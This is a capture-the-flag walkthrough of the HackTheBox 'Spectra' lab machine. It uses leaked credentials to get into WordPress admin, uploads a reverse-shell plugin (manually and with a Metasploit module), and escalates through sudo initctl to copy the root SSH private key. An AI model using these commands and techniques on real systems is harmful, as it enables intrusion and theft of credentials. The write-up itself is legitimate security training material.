HackTheBox: (“Spectra”) — Walkthrough
Hi People :D
Today we gonna solve “Spectra” machine from HackTheBox, an easy machine that focuses on WordPress exploitation and service manipulation, let’s go :D
— — — — — —
Start with Nmap
nmap -A 10.10.10.229
We have three open ports (22/80/3306) we can’t do anything with port 3306 so let’s navigate to the website on port 80
— — — — — — — —
On port 80, we have a basic website that contains two URLs
The first URL (The Software Issue Tracker button ) redirecting us to (“http://spectra.htb/main/”) so we need to add spectra.htb domain to the /etc/hosts file first to be able to see the website contains.
After adding it, navigate to (“http://spectra.htb/main/”), we have a Log in button and it seems interesting so let’s check out
Hmmm, we have a WordPress login form.
First, let’s try some default credentials like admin, administrator… etc.
When we try admin as a username, it says “Unknown username” which means that’s no username called admin
Let’s try administrator as a username with any password, this time it says “The password is incorrect” so we have a username called administrator but we don’t know the password
Now let’s check on the second URL that we found in the machine IP (“http://spectra.htb/testing/index.php”), it gives us an error
But it’s only the index page! so let’s fuzzing directories to see if there are any hidden directories (I used dirsearch tool)
./dirsearch.py -u http://spectra.htb/testing/ -e "*" -i 200
We have a file called wp-config.php.save, let’s see its contents
It’s a blank page, but there’s a lot of data in the source code.
In the middle of this data, there’s a username and password (
After I saw these creds, it came to my mind immediately that it may be the credentials for the WordPress login page.
I tried devtest as a username and devteam01 as a password but it said “Unknown username”, so I used the password only and keep the username administrator.
Fortunately, it worked! I was able to log into the WordPress admin panel with these creds (
— — — — — —
[*] Manual Exploitation :
According to This Article, We can manually upload a zipped reverse shell as a plugin
Cool! let’s copy this code to a file called wp-ReverseShell.php ( or any other name you want ) then change the bash reverse shell command to a Pentestmonkey PHP Reverse Shell ( because the bash one didn’t work for me ), then change the IP in the script to your HTB one and finally make a ZIP archive of this script using :
zip wp-ReverseShell.zip ./wp-ReverseShell.php
( Note: the commented block of code at the top of the script is required for it to work because this is the format of WordPress plugins )
Now our ZIP archive is ready for upload.
Start a Netcat listener first and after that, Navigate to the WordPress admin panel again and from the left menu click on Plugins > Add New > Upload Plugin > Browse, then choose your zipped archive of the script and click on Install Now.
At this point, the plugin is installed, but you have to click on Activate Plugin button to get a shell as nginx.
This GIF simplifies the uploading process :
You can improve your shell by executing these commands :
python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux
[*] Automated Exploitation :
We can use This Metasploit module to automatically upload a reverse shell on the WordPress admin panel and open a shell
Let’s set the module requirements first :
set PASSWORD devteam01 set RHOSTS 10.10.10.229set TARGETURI /mainset USERNAME administratorset lhost tun0exploit
After running this module with these options, you’ll get a shell as nginx
— — — — —
After some file enumeration, I found an interesting script called autologin.conf.orig located in the /opt/ directory.
This script reads a password from another file called passwd located in /etc/autologin directory
Navigate to /etc/autologin directory, there’s the passwd file which contains a password that we’re looking for (
We need to find the correct user to use this password with him, we can display the users by navigating to /home directory and see users names by listing the directory names, or by reading /etc/passwd file
We have 2 users (Chronos & katie), the password that we found earlier (
SummerHereWeCome!!) works with katie so we can SSH into katie and read the user flag from user.txt located in /home/katie directory ☺
— — — — —
From katie’s shell, execute
sudo -l command to see if we can run any service or file as root without a password.
In this machine, we can run initctl as root without a password
init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.
These init files have *.conf extension and they’re located in /etc/init directory.
In our machine, we have a lot of these .conf files but they’re some test files so let’s see any of them
These .conf files have a slightly weird format but they seem to execute normal bash commands between script & end script tags
If we can edit this test.conf file and run it using initctl, we will be able to execute any command as root !!
So let’s try to edit this test.conf file by putting a command that copies the root private SSH key from /root/.ssh/id_rsa file to another file called id_rsa located in /home/katie/ directory (or any directory that we have access to) then gives it world-write&read permission with
chmod 777 command:
cp /root/.ssh/id_rsa /home/katie/id_rsa && chmod 777 /home/katie/id_rsa
After editing the test.conf file, run
sudo initctl start test command and you’ll see that the id_rsa file has been created and contains the root private SSH key which we can use to SSH into root then read the root flag from /root/root.txt
OR we can get the root flag directly by editing the file to copy the root flag from /root/root.txt file to /home/katie/flag.txt file then gives it full permission:
cp /root/root.txt /home/katie/flag.txt && chmod 777 /home/katie/flag.txt
sudo initctl start test, this time the flag.txt file will be created with the root flag inside ☺